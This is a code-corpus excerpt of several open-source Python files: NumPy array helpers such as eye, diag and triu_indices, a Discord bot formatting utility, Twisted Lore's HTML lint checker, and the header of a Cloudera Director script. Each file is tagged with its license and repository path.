Returns
-------
f : ndarray
A view of `m` with the columns reversed. Since a view
is returned, this operation is :math:`\\mathcal O(1)`.
See Also
--------
flipud : Flip array in the up/down direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to m[:,::-1]. Requires the array to be at least 2-D.
Examples
--------
>>> A = np.diag([1.,2.,3.])
>>> A
array([[ 1., 0., 0.],
[ 0., 2., 0.],
[ 0., 0., 3.]])
>>> np.fliplr(A)
array([[ 0., 0., 1.],
[ 0., 2., 0.],
[ 3., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.fliplr(A) == A[:,::-1,...])
True
"""
m = asanyarray(m)
if m.ndim < 2:
raise ValueError("Input must be >= 2-d.")
return m[:, ::-1]
@array_function_dispatch(_flip_dispatcher)
def flipud(m):
"""
Flip array in the up/down direction.
Flip the entries in each column in the up/down direction.
Rows are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array.
Returns
-------
out : array_like
A view of `m` with the rows reversed. Since a view is
returned, this operation is :math:`\\mathcal O(1)`.
See Also
--------
fliplr : Flip array in the left/right direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to ``m[::-1,...]``.
Does not require the array to be two-dimensional.
Examples
--------
>>> A = np.diag([1.0, 2, 3])
>>> A
array([[ 1., 0., 0.],
[ 0., 2., 0.],
[ 0., 0., 3.]])
>>> np.flipud(A)
array([[ 0., 0., 3.],
[ 0., 2., 0.],
[ 1., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.flipud(A) == A[::-1,...])
True
>>> np.flipud([1,2])
array([2, 1])
"""
m = asanyarray(m)
if m.ndim < 1:
raise ValueError("Input must be >= 1-d.")
return m[::-1, ...]
def eye(N, M=None, k=0, dtype=float, order='C'):
"""
Return a 2-D array with ones on the diagonal and zeros elsewhere.
Parameters
----------
N : int
Number of rows in the output.
M : int, optional
Number of columns in the output. If None, defaults to `N`.
k : int, optional
Index of the diagonal: 0 (the default) refers to the main diagonal,
a positive value refers to an upper diagonal, and a negative value
to a lower diagonal.
dtype : data-type, optional
Data-type of the returned array.
order : {'C', 'F'}, optional
Whether the output should be stored in row-major (C-style) or
column-major (Fortran-style) order in memory.
.. versionadded:: 1.14.0
Returns
-------
I : ndarray of shape (N,M)
An array where all elements are equal to zero, except for the `k`-th
diagonal, whose values are equal to one.
See Also
--------
identity : (almost) equivalent function
diag : diagonal 2-D array from a 1-D array specified by the user.
Examples
--------
>>> np.eye(2, dtype=int)
array([[1, 0],
[0, 1]])
>>> np.eye(3, k=1)
array([[ 0., 1., 0.],
[ 0., 0., 1.],
[ 0., 0., 0.]])
"""
if M is None:
M = N
m = zeros((N, M), dtype=dtype, order=order)
if k >= M:
return m
if k >= 0:
i = k
else:
i = (-k) * M
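    # Stepping through the flat array with stride M+1 moves one row down and
    # one column right per step, i.e. along a diagonal; `i` is the flat
    # offset of the diagonal's first element.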
m[:M-k].flat[i::M+1] = 1
return m
def _diag_dispatcher(v, k=None):
return (v,)
@array_function_dispatch(_diag_dispatcher)
def diag(v, k=0):
"""
Extract a diagonal or construct a diagonal array.
See the more detailed documentation for ``numpy.diagonal`` if you use this
function to extract a diagonal and wish to write to the resulting array;
whether it returns a copy or a view depends on what version of numpy you
are using.
Parameters
----------
v : array_like
If `v` is a 2-D array, return a copy of its `k`-th diagonal.
If `v` is a 1-D array, return a 2-D array with `v` on the `k`-th
diagonal.
k : int, optional
Diagonal in question. The default is 0. Use `k>0` for diagonals
above the main diagonal, and `k<0` for diagonals below the main
diagonal.
Returns
-------
out : ndarray
The extracted diagonal or constructed diagonal array.
See Also
--------
diagonal : Return specified diagonals.
diagflat : Create a 2-D array with the flattened input as a diagonal.
trace : Sum along diagonals.
triu : Upper triangle of an array.
tril : Lower triangle of an array.
Examples
--------
>>> x = np.arange(9).reshape((3,3))
>>> x
array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> np.diag(x)
array([0, 4, 8])
>>> np.diag(x, k=1)
array([1, 5])
>>> np.diag(x, k=-1)
array([3, 7])
>>> np.diag(np.diag(x))
array([[0, 0, 0],
[0, 4, 0],
[0, 0, 8]])
"""
v = asanyarray(v)
s = v.shape
if len(s) == 1:
n = s[0]+abs(k)
res = zeros((n, n), v.dtype)
if k >= 0:
i = k
else:
i = (-k) * n
res[:n-k].flat[i::n+1] = v
return res
elif len(s) == 2:
return diagonal(v, k)
else:
raise ValueError("Input must be 1- or 2-d.")
@array_function_dispatch(_diag_dispatcher)
def diagflat(v, k=0):
"""
Create a two-dimensional array with the flattened input as a diagonal.
Parameters
----------
v : array_like
Input data, which is flattened and set as the `k`-th
diagonal of the output.
k : int, optional
Diagonal to set; 0, the default, corresponds to the "main" diagonal,
a positive (negative) `k` giving the number of the diagonal above
(below) the main.
Returns
-------
out : ndarray
The 2-D output array.
See Also
--------
diag : MATLAB work-alike for 1-D and 2-D arrays.
diagonal : Return specified diagonals.
trace : Sum along diagonals.
Examples
--------
>>> np.diagflat([[1,2], [3,4]])
array([[1, 0, 0, 0],
[0, 2, 0, 0],
[0, 0, 3, 0],
[0, 0, 0, 4]])
>>> np.diagflat([1,2], 1)
array([[0, 1, 0],
[0, 0, 2],
[0, 0, 0]])
"""
try:
wrap = v.__array_wrap__
except AttributeError:
wrap = None
v = asarray(v).ravel()
s = len(v)
n = s + abs(k)
res = zeros((n, n), v.dtype)
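    # Flat index of (row, col) in an (n, n) array is row*n + col, so the
    # k-th diagonal entries (i, i+k) sit at i*n + i + k for k >= 0, and
    # (i-k, i) at (i-k)*n + i for k < 0.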
if (k >= 0):
i = arange(0, n-k)
fi = i+k+i*n
else:
i = arange(0, n+k)
fi = i+(i-k)*n
res.flat[fi] = v
if not wrap:
return res
return wrap(res)
def tri(N, M=None, k=0, dtype=float):
"""
An array with ones at and below the given diagonal and zeros elsewhere.
Parameters
----------
N : int
Number of rows in the array.
M : int, optional
Number of columns in the array.
By default, `M` is taken equal to `N`.
k : int, optional
The sub-diagonal at and below which the array is filled.
`k` = 0 is the main diagonal, while `k` < 0 is below it,
and `k` > 0 is above. The default is 0.
dtype : dtype, optional
Data type of the returned array. The default is float.
Returns
-------
tri : ndarray of shape (N, M)
Array with its lower triangle filled with ones and zero elsewhere;
        in other words ``T[i,j] == 1`` for ``j <= i + k``, 0 otherwise.
Examples
--------
>>> np.tri(3, 5, 2, dtype=int)
array([[1, 1, 1, 0, 0],
[1, 1, 1, 1, 0],
[1, 1, 1, 1, 1]])
>>> np.tri(3, 5, -1)
array([[ 0., 0., 0., 0., 0.],
[ 1., 0., 0., 0., 0.],
[ 1., 1., 0., 0., 0.]])
"""
if M is None:
M = N
m = greater_equal.outer(arange(N, dtype=_min_int(0, N)),
arange(-k, M-k, dtype=_min_int(-k, M - k)))
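    # The outer comparison yields m[i, j] = (i >= j - k), i.e. True exactly
    # where j <= i + k (at and below the k-th diagonal).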
# Avoid making a copy if the requested type is already bool
m = m.astype(dtype, copy=False)
return m
def _trilu_dispatcher(m, k=None):
return (m,)
@array_function_dispatch(_trilu_dispatcher)
def tril(m, k=0):
"""
Lower triangle of an array.
Return a copy of an array with elements above the `k`-th diagonal zeroed.
Parameters
----------
m : array_like, shape (M, N)
Input array.
k : int, optional
Diagonal above which to zero elements. `k = 0` (the default) is the
main diagonal, `k < 0` is below it and `k > 0` is above.
Returns
-------
tril : ndarray, shape (M, N)
Lower triangle of `m`, of same shape and data-type as `m`.
See Also
--------
triu : same thing, only for the upper triangle
Examples
--------
>>> np.tril([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], -1)
array([[ 0, 0, 0],
[ 4, 0, 0],
[ 7, 8, 0],
[10, 11, 12]])
"""
m = asanyarray(m)
mask = tri(*m.shape[-2:], k=k, dtype=bool)
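    # zeros(1, m.dtype) broadcasts against m, so entries above the k-th
    # diagonal are zeroed without allocating a full zero array.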
return where(mask, m, zeros(1, m.dtype))
@array_function_dispatch(_trilu_dispatcher)
def triu(m, k=0):
"""
Upper triangle of an array.
Return a copy of a matrix with the elements below the `k`-th diagonal
zeroed.
Please refer to the documentation for `tril` for further details.
See Also
--------
tril : lower triangle of an array
Examples
--------
>>> np.triu([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], -1)
array([[ 1, 2, 3],
[ 4, 5, 6],
[ 0, 8, 9],
[ 0, 0, 12]])
"""
m = asanyarray(m)
mask = tri(*m.shape[-2:], k=k-1, dtype=bool)
return where(mask, zeros(1, m.dtype), m)
def _vander_dispatcher(x, N=None, increasing=None):
return (x,)
# Originally borrowed from John Hunter and matplotlib
@array_function_dispatch(_vander_dispatcher)
def vander(x, N=None, increasing=False):
"""
Generate a Vandermonde matrix.
The columns of the output matrix are powers of the input vector. The
order of the powers is determined by the `increasing` boolean argument.
Specifically, when `increasing` is False, the `i`-th output column is
the input vector raised element-wise to the power of ``N - i - 1``. Such
a matrix with a geometric progression in each row is named for Alexandre-
Theophile Vandermonde.
Parameters
----------
x : array_like
1-D input array.
N : int, optional
Number of columns in the output. If `N` is not specified, a square
array is returned (``N = len(x)``).
increasing : bool, optional
Order of the powers of the columns. If True, the powers increase
from left to right, if False (the default) they are reversed.
.. versionadded:: 1.9.0
Returns
-------
out : ndarray
Vandermonde matrix. If `increasing` is False, the first column is
``x^(N-1)``, the second ``x^(N-2)`` and so forth. If `increasing` is
True, the columns are ``x^0, x^1, ..., x^(N-1)``.
See Also
--------
polynomial.polynomial.polyvander
Examples
--------
>>> x = np.array([1, 2, 3, 5])
>>> N = 3
>>> np.vander(x, N)
array([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> np.column_stack([x**(N-1-i) for i in range(N)])
array([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> x = np.array([1, 2, 3, 5])
>>> np.vander(x)
array([[ 1, 1, 1, 1],
[ 8, 4, 2, 1],
[ 27, 9, 3, 1],
[125, 25, 5, 1]])
>>> np.vander(x, increasing=True)
array([[ 1, 1, 1, 1],
[ 1, 2, 4, 8],
[ 1, 3, 9, 27],
[ 1, 5, 25, 125]])
The determinant of a square Vandermonde matrix is the product
of the differences between the values of the input vector:
>>> np.linalg.det(np.vander(x))
48.000000000000043
>>> (5-3)*(5-2)*(5-1)*(3-2)*(3-1)*(2-1)
48
"""
x = asarray(x)
if x.ndim != 1:
raise ValueError("x must be a one-dimensional array or sequence.")
if N is None:
N = len(x)
v = empty((len(x), N), dtype=promote_types(x.dtype, int))
tmp = v[:, ::-1] if not increasing else v
if N > 0:
tmp[:, 0] = 1
if N > 1:
tmp[:, 1:] = x[:, None]
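        # Each remaining column starts out equal to x; the cumulative product
        # along axis 1 then turns column j into x**j. When `increasing` is
        # False, tmp is a reversed view of v, giving decreasing powers.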
multiply.accumulate(tmp[:, 1:], out=tmp[:, 1:], axis=1)
return v
def _histogram2d_dispatcher(x, y, bins=None, range=None, normed=None,
weights=None, density=None):
return (x, y, bins, weights)
@array_function_dispatch(_histogram2d_dispatcher)
def histogram2d(x, y, bins=10, range=None, normed=None, weights=None,
density=None):
"""
Compute the bi-dimensional histogram of two data samples.
Parameters
----------
x : array_like, shape (N,)
An array containing the x coordinates of the points to be
histogrammed.
y : array_like, shape (N,)
An array containing the y coordinates of the points to be
histogrammed.
bins : int or array_like or [int, int] or [array, array], optional
The bin specification:
* If int, the number of bins for the two dimensions (nx=ny=bins).
* If array_like, the bin edges for the two dimensions
(x_edges=y_edges=bins).
* If [int, int], the number of bins in each dimension
(nx, ny = bins).
* If [array, array], the bin edges in each dimension
(x_edges, y_edges = bins).
* A combination [int, array] or [array, int], where int
is the number of bins and array is the bin edges.
range : array_like, shape(2,2), optional
The leftmost and rightmost edges of the bins along each dimension
(if not specified explicitly in the `bins` parameters):
``[[xmin, xmax], [ymin, ymax]]``. All values outside of this range
will be considered outliers and not tallied in the histogram.
density : bool, optional
If False, the default, returns the number of samples in each bin.
If True, returns the probability *density* function at the bin,
``bin_count / sample_count / bin_area``.
normed : bool, optional
An alias for the density argument that behaves identically. To avoid
confusion with the broken normed argument to `histogram`, `density`
should be preferred.
weights : array_like, shape(N,), optional
An array of values ``w_i`` weighing each sample ``(x_i, y_i)``.
Weights are normalized to 1 if `normed` is True. If `normed` is
False, the values of the returned histogram are equal to the sum of
the weights belonging to the samples falling into each bin.
Returns
-------
H : ndarray, shape(nx, ny)
The bi-dimensional histogram of samples `x` and `y`. Values in `x`
are histogrammed along the first dimension and values in `y` are
histogrammed along the second dimension.
xedges : ndarray, shape(nx+1,)
The bin edges along the first dimension.
yedges : ndarray, shape(ny+1,)
The bin edges along the second dimension.
See Also
--------
histogram : 1D histogram
histogramdd : Multidimensional histogram
Notes
-----
When `normed` is True, then the returned histogram is the sample
density, defined such that the sum over bins of the product
``bin_value * bin_area`` is 1.
Please note that the histogram does not follow the Cartesian convention
where `x` values are on the abscissa and `y` values on the ordinate
axis. Rather, `x` is histogrammed along the first dimension of the
array (vertical), and `y` along the second dimension of the array
(horizontal). This ensures compatibility with `histogramdd`.
Examples
--------
>>> import matplotlib as mpl
>>> import matplotlib.pyplot as plt
Construct a 2-D histogram with variable bin width. First define the bin
edges:
>>> xedges = [0, 1, 3, 5]
>>> yedges = [0, 2, 3, 4, 6]
Next we create a histogram H with random bin content:
>>> x = np.random.normal(2, 1, 100)
>>> y = np.random.normal(1, 1, 100)
>>> H, xedges, yedges = np.histogram2d(x, y, bins=(xedges, yedges))
>>> H = H.T # Let each row list bins with common y range.
:func:`imshow <matplotlib.pyplot.imshow>` can only display square bins:
>>> fig = plt.figure(figsize=(7, 3))
>>> ax = fig.add_subplot(131, title='imshow: square bins')
    >>> plt.imshow(H, interpolation='nearest', origin='lower',
... extent=[xedges[0], xedges[-1], yedges[0], yedges[-1]])
:func:`pcolormesh <matplotlib.pyplot.pcolormesh>` can display actual edges:
>>> ax = fig.add_subplot(132, title='pcolormesh: actual edges',
... aspect='equal')
>>> X, Y = np.meshgrid(xedges, yedges)
>>> ax.pcolormesh(X, Y, H)
:class:`NonUniformImage <matplotlib.image.NonUniformImage>` can be used to
display actual bin edges with interpolation:
>>> ax = fig.add_subplot(133, title='NonUniformImage: interpolated',
... aspect='equal', xlim=xedges[[0, -1]], ylim=yedges[[0, -1]])
>>> im = mpl.image.NonUniformImage(ax, interpolation='bilinear')
>>> xcenters = (xedges[:-1] + xedges[1:]) / 2
>>> ycenters = (yedges[:-1] + yedges[1:]) / 2
>>> im.set_data(xcenters, ycenters, H)
>>> ax.images.append(im)
>>> plt.show()
"""
from numpy import histogramdd
try:
N = len(bins)
except TypeError:
N = 1
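    # If `bins` is a bare array of edges (len neither 1 nor 2), the same
    # edges are used for both dimensions.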
if N != 1 and N != 2:
xedges = yedges = asarray(bins)
bins = [xedges, yedges]
hist, edges = histogramdd([x, y], bins, range, normed, weights, density)
return hist, edges[0], edges[1]
def mask_indices(n, mask_func, k=0):
"""
Return the indices to access (n, n) arrays, given a masking function.
Assume `mask_func` is a function that, for a square array a of size
``(n, n)`` with a possible offset argument `k`, when called as
``mask_func(a, k)`` returns a new array with zeros in certain locations
(functions like `triu` or `tril` do precisely this). Then this function
returns the indices where the non-zero values would be located.
Parameters
----------
n : int
The returned indices will be valid to access arrays of shape (n, n).
mask_func : callable
A function whose call signature is similar to that of `triu`, `tril`.
That is, ``mask_func(x, k)`` returns a boolean array, shaped like `x`.
`k` is an optional argument to the function.
k : scalar
An optional argument which is passed through to `mask_func`. Functions
like `triu`, `tril` take a second argument that is interpreted as an
offset.
Returns
-------
indices : tuple of arrays.
The `n` arrays of indices corresponding to the locations where
``mask_func(np.ones((n, n)), k)`` is True.
See Also
--------
triu, tril, triu_indices, tril_indices
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
These are the indices that would allow you to access the upper triangular
part of any 3x3 array:
>>> iu = np.mask_indices(3, np.triu)
For example, if `a` is a 3x3 array:
>>> a = np.arange(9).reshape(3, 3)
>>> a
array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> a[iu]
array([0, 1, 2, 4, 5, 8])
An offset can be passed also to the masking function. This gets us the
indices starting on the first diagonal right of the main one:
>>> iu1 = np.mask_indices(3, np.triu, 1)
with which we now extract only three elements:
>>> a[iu1]
array([1, 2, 5])
"""
m = ones((n, n), int)
a = mask_func(m, k)
return nonzero(a != 0)
def tril_indices(n, k=0, m=None):
"""
Return the indices for the lower-triangle of an (n, m) array.
Parameters
----------
n : int
The row dimension of the arrays for which the returned
indices will be valid.
k : int, optional
Diagonal offset (see `tril` for details).
m : int, optional
.. versionadded:: 1.9.0
The column dimension of the arrays for which the returned
arrays will be valid.
By default `m` is taken equal to `n`.
Returns
-------
inds : tuple of arrays
The indices for the triangle. The returned tuple contains two arrays,
each with the indices along one dimension of the array.
See also
--------
triu_indices : similar function, for upper-triangular.
mask_indices : generic function accepting an arbitrary mask function.
tril, triu
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
Compute two different sets of indices to access 4x4 arrays, one for the
lower triangular part starting at the main diagonal, and one starting two
diagonals further right:
>>> il1 = np.tril_indices(4)
>>> il2 = np.tril_indices(4, 2)
Here is how they can be used with a sample array:
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
Both for indexing:
>>> a[il1]
array([ 0, 4, 5, 8, 9, 10, 12, 13, 14, 15])
And for assigning values:
>>> a[il1] = -1
>>> a
array([[-1, 1, 2, 3],
[-1, -1, 6, 7],
[-1, -1, -1, 11],
[-1, -1, -1, -1]])
These cover almost the whole array (two diagonals right of the main one):
>>> a[il2] = -10
>>> a
array([[-10, -10, -10, 3],
[-10, -10, -10, -10],
[-10, -10, -10, -10],
[-10, -10, -10, -10]])
"""
return nonzero(tri(n, m, k=k, dtype=bool))
def _trilu_indices_form_dispatcher(arr, k=None):
return (arr,)
@array_function_dispatch(_trilu_indices_form_dispatcher)
def tril_indices_from(arr, k=0):
"""
Return the indices for the lower-triangle of arr.
See `tril_indices` for full details.
Parameters
----------
arr : array_like
The indices will be valid for square arrays whose dimensions are
the same as arr.
k : int, optional
Diagonal offset (see `tril` for details).
See Also
--------
tril_indices, tril
Notes
-----
.. versionadded:: 1.4.0
"""
if arr.ndim != 2:
raise ValueError("input array must be 2-d")
return tril_indices(arr.shape[-2], k=k, m=arr.shape[-1])
def triu_indices(n, k=0, m=None):
"""
Return the indices for the upper-triangle of an (n, m) array.
Parameters
----------
n : int
The size of the arrays for which the returned indices will
be valid.
k : int, optional
Diagonal offset (see `triu` for details).
m : int, optional
.. versionadded:: 1.9.0
The column dimension of the arrays for which the returned
arrays will be valid.
By default `m` is taken equal to `n`.
Returns
-------
inds : tuple, shape(2) of ndarrays, shape(`n`)
The indices for the triangle. The returned tuple contains two arrays,
each with the indices along one dimension of the array. Can be used
to slice a ndarray of shape(`n`, `n`).
See also
--------
tril_indices : similar function, for lower-triangular.
mask_indices : generic function accepting an arbitrary mask function.
triu, tril
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
Compute two different sets of indices to access 4x4 arrays, one for the
upper triangular part starting at the main diagonal, and one starting two
diagonals further right:
>>> iu1 = np.triu_indices(4)
>>> iu2 = np.triu_indices(4, 2)
Here is how they can be used with a sample array:
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
Both for indexing:
>>> a[iu1]
array([ 0, 1, 2, 3, 5, 6, 7, 10, 11, 15])
And for assigning values:
>>> a[iu1] = -1
>>> a
array([[-1, -1, -1, -1],
[ 4, -1, -1, -1],
[ 8, 9, -1, -1],
[12, 13, 14, -1]])
These cover only a small part of the whole array (two diagonals right
of the main one):
>>> a[iu2] = -10
>>> a
array([[ -1, -1, -10, -10],
[ 4, -1, -1, -10],
[ 8, 9, -1, -1],
[ 12, 13, 14, -1]])
"""
return nonzero(~tri(n, m, k=k-1, dtype=bool))
@array_function_dispatch(_trilu_indices_form_dispatcher)
def triu_indices_from(arr, k=0):
"""
Return the indices for the upper-triangle of arr.
See `triu_indices` for full details.
Parameters
----------
arr : ndarray, shape(N, N)
The indices will be valid for square arrays.
k : int, optional
Diagonal offset (see `triu` for details).
Returns
-------
triu_indices_from : tuple, shape(2) of ndarray, shape(N)
Indices for the upper-triangle of `arr`.
See Also
--------
triu_indices, triu
Notes
-----
.. versionadded:: 1.4.0
"""
if arr.ndim != 2:
raise ValueError("input array must be 2-d")
return triu_indices(arr.shape[-2], k=k, m=arr.shape[-1])
|
bsd-3-clause
|
sedruk/Red-DiscordBot
|
cogs/utils/formats.py
|
2
|
2642
|
# Manually imported from:
# https://github.com/Rapptz/RoboDanny/blob/master/cogs/utils/formats.py
# DATE IMPORTED: 2014-04-10
import datetime
async def entry_to_code(bot, entries):
width = max(map(lambda t: len(t[0]), entries))
output = ['```']
fmt = '{0:<{width}}: {1}'
for name, entry in entries:
output.append(fmt.format(name, entry, width=width))
output.append('```')
await bot.say('\n'.join(output))
async def indented_entry_to_code(bot, entries):
width = max(map(lambda t: len(t[0]), entries))
output = ['```']
fmt = '\u200b{0:>{width}}: {1}'
for name, entry in entries:
output.append(fmt.format(name, entry, width=width))
output.append('```')
await bot.say('\n'.join(output))
async def too_many_matches(bot, msg, matches, entry):
check = lambda m: m.content.isdigit()
await bot.say('There are too many matches... Which one did you mean? **Only say the number**.')
await bot.say('\n'.join(map(entry, enumerate(matches, 1))))
# only give them 3 tries.
for i in range(3):
message = await bot.wait_for_message(author=msg.author, channel=msg.channel, check=check)
index = int(message.content)
try:
return matches[index - 1]
        except IndexError:
await bot.say('Please give me a valid number. {} tries remaining...'.format(2 - i))
raise ValueError('Too many tries. Goodbye.')
class Plural:
def __init__(self, **attr):
iterator = attr.items()
self.name, self.value = next(iter(iterator))
def __str__(self):
v = self.value
        if v != 1:
return '%s %ss' % (v, self.name)
return '%s %s' % (v, self.name)
def human_timedelta(dt):
now = datetime.datetime.utcnow()
delta = now - dt
hours, remainder = divmod(int(delta.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
years, days = divmod(days, 365)
if years:
if days:
return '%s and %s ago' % (Plural(year=years), Plural(day=days))
return '%s ago' % Plural(year=years)
if days:
if hours:
return '%s and %s ago' % (Plural(day=days), Plural(hour=hours))
return '%s ago' % Plural(day=days)
if hours:
if minutes:
return '%s and %s ago' % (Plural(hour=hours), Plural(minute=minutes))
return '%s ago' % Plural(hour=hours)
if minutes:
if seconds:
return '%s and %s ago' % (Plural(minute=minutes), Plural(second=seconds))
return '%s ago' % Plural(minute=minutes)
return '%s ago' % Plural(second=seconds)
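# Illustrative call (hypothetical timestamp):
#   human_timedelta(datetime.datetime.utcnow()
#                   - datetime.timedelta(hours=3, minutes=5))
#   # -> '3 hours and 5 minutes ago'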
|
gpl-3.0
|
hendradarwin/VTK
|
ThirdParty/Twisted/twisted/lore/lint.py
|
32
|
8849
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Checker for common errors in Lore documents.
"""
from xml.dom import minidom as dom
import parser
import urlparse
import os.path
from twisted.lore import tree, process
from twisted.web import domhelpers
from twisted.python import reflect
from twisted.python.versions import Version
from twisted.python.deprecate import deprecatedModuleAttribute
parserErrors = (SyntaxError,)
deprecatedModuleAttribute(
Version("Twisted", 13, 1, 0),
"parserErrors is deprecated",
__name__,
"parserErrors")
class TagChecker:
def check(self, dom, filename):
self.hadErrors = 0
for method in reflect.prefixedMethods(self, 'check_'):
method(dom, filename)
if self.hadErrors:
raise process.ProcessingFailure("invalid format")
def _reportError(self, filename, element, error):
hlint = element.hasAttribute('hlint') and element.getAttribute('hlint')
if hlint != 'off':
self.hadErrors = 1
pos = getattr(element, '_markpos', None) or (0, 0)
print "%s:%s:%s: %s" % ((filename,)+pos+(error,))
class DefaultTagChecker(TagChecker):
def __init__(self, allowedTags, allowedClasses):
self.allowedTags = allowedTags
self.allowedClasses = allowedClasses
def check_disallowedElements(self, dom, filename):
def m(node, self=self):
return not self.allowedTags(node.tagName)
for element in domhelpers.findElements(dom, m):
self._reportError(filename, element,
'unrecommended tag %s' % element.tagName)
def check_disallowedClasses(self, dom, filename):
def matcher(element, self=self):
if not element.hasAttribute('class'):
return 0
checker = self.allowedClasses.get(element.tagName, lambda x:0)
return not checker(element.getAttribute('class'))
for element in domhelpers.findElements(dom, matcher):
self._reportError(filename, element,
'unknown class %s' %element.getAttribute('class'))
def check_quote(self, doc, filename):
def matcher(node):
return ('"' in getattr(node, 'data', '') and
not isinstance(node, dom.Comment) and
not [1 for n in domhelpers.getParents(node)[1:-1]
if n.tagName in ('pre', 'code')])
for node in domhelpers.findNodes(doc, matcher):
self._reportError(filename, node.parentNode, 'contains quote')
def check_styleattr(self, dom, filename):
for node in domhelpers.findElementsWithAttribute(dom, 'style'):
self._reportError(filename, node, 'explicit style')
def check_align(self, dom, filename):
for node in domhelpers.findElementsWithAttribute(dom, 'align'):
self._reportError(filename, node, 'explicit alignment')
def check_style(self, dom, filename):
for node in domhelpers.findNodesNamed(dom, 'style'):
if domhelpers.getNodeText(node) != '':
self._reportError(filename, node, 'hand hacked style')
def check_title(self, dom, filename):
doc = dom.documentElement
title = domhelpers.findNodesNamed(dom, 'title')
if len(title)!=1:
return self._reportError(filename, doc, 'not exactly one title')
h1 = domhelpers.findNodesNamed(dom, 'h1')
if len(h1)!=1:
return self._reportError(filename, doc, 'not exactly one h1')
if domhelpers.getNodeText(h1[0]) != domhelpers.getNodeText(title[0]):
self._reportError(filename, h1[0], 'title and h1 text differ')
def check_80_columns(self, dom, filename):
for node in domhelpers.findNodesNamed(dom, 'pre'):
# the ps/pdf output is in a font that cuts off at 80 characters,
# so this is enforced to make sure the interesting parts (which
# are likely to be on the right-hand edge) stay on the printed
# page.
for line in domhelpers.gatherTextNodes(node, 1).split('\n'):
if len(line.rstrip()) > 80:
self._reportError(filename, node,
'text wider than 80 columns in pre')
for node in domhelpers.findNodesNamed(dom, 'a'):
if node.getAttribute('class').endswith('listing'):
try:
fn = os.path.dirname(filename)
fn = os.path.join(fn, node.getAttribute('href'))
lines = open(fn,'r').readlines()
except:
self._reportError(filename, node,
'bad listing href: %r' %
node.getAttribute('href'))
continue
for line in lines:
if len(line.rstrip()) > 80:
self._reportError(filename, node,
'listing wider than 80 columns')
def check_pre_py_listing(self, dom, filename):
for node in domhelpers.findNodesNamed(dom, 'pre'):
if node.getAttribute('class') == 'python':
try:
text = domhelpers.getNodeText(node)
# Fix < and >
                    text = text.replace('&gt;', '>').replace('&lt;', '<')
# Strip blank lines
lines = filter(None,[l.rstrip() for l in text.split('\n')])
# Strip leading space
while not [1 for line in lines if line[:1] not in ('',' ')]:
lines = [line[1:] for line in lines]
text = '\n'.join(lines) + '\n'
try:
parser.suite(text)
except SyntaxError:
# Pretend the "..." idiom is syntactically valid
text = text.replace("...","'...'")
parser.suite(text)
except SyntaxError as e:
self._reportError(filename, node,
'invalid python code:' + str(e))
def check_anchor_in_heading(self, dom, filename):
headingNames = ['h%d' % n for n in range(1,7)]
for hname in headingNames:
for node in domhelpers.findNodesNamed(dom, hname):
if domhelpers.findNodesNamed(node, 'a'):
self._reportError(filename, node, 'anchor in heading')
def check_texturl_matches_href(self, dom, filename):
for node in domhelpers.findNodesNamed(dom, 'a'):
if not node.hasAttribute('href'):
continue
text = domhelpers.getNodeText(node)
proto = urlparse.urlparse(text)[0]
if proto and ' ' not in text:
if text != node.getAttribute('href'):
self._reportError(filename, node,
'link text does not match href')
def check_lists(self, dom, filename):
for node in (domhelpers.findNodesNamed(dom, 'ul')+
domhelpers.findNodesNamed(dom, 'ol')):
if not node.childNodes:
self._reportError(filename, node, 'empty list')
for child in node.childNodes:
if child.nodeName != 'li':
self._reportError(filename, node,
'only list items allowed in lists')
def list2dict(l):
d = {}
for el in l:
d[el] = None
return d
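# Note: equivalent to dict.fromkeys(l); the explicit loop is kept from the
# original Twisted source.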
classes = list2dict(['shell', 'API', 'python', 'py-prototype', 'py-filename',
'py-src-string', 'py-signature', 'py-src-parameter',
'py-src-identifier', 'py-src-keyword'])
tags = list2dict(["html", "title", "head", "body", "h1", "h2", "h3", "ol", "ul",
"dl", "li", "dt", "dd", "p", "code", "img", "blockquote", "a",
"cite", "div", "span", "strong", "em", "pre", "q", "table",
"tr", "td", "th", "style", "sub", "sup", "link"])
span = list2dict(['footnote', 'manhole-output', 'index'])
div = list2dict(['note', 'boxed', 'doit'])
a = list2dict(['listing', 'py-listing', 'html-listing', 'absolute'])
pre = list2dict(['python', 'shell', 'python-interpreter', 'elisp'])
allowed = {'code': classes.has_key, 'span': span.has_key, 'div': div.has_key,
'a': a.has_key, 'pre': pre.has_key, 'ul': lambda x: x=='toc',
'ol': lambda x: x=='toc', 'li': lambda x: x=='ignoretoc'}
def getDefaultChecker():
return DefaultTagChecker(tags.__contains__, allowed)
def doFile(file, checker):
doc = tree.parseFileAndReport(file)
if doc:
checker.check(doc, file)
|
bsd-3-clause
|
anhowe/azure-quickstart-templates
|
cloudera-director-on-centos/scripts/marketing.py
|
103
|
3151
|
#! /usr/bin/env python
# Copyright (c) 2016 Cloudera, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Simple script that shows how to use the Cloudera Director API to initialize
# the environment and instance templates
import urllib
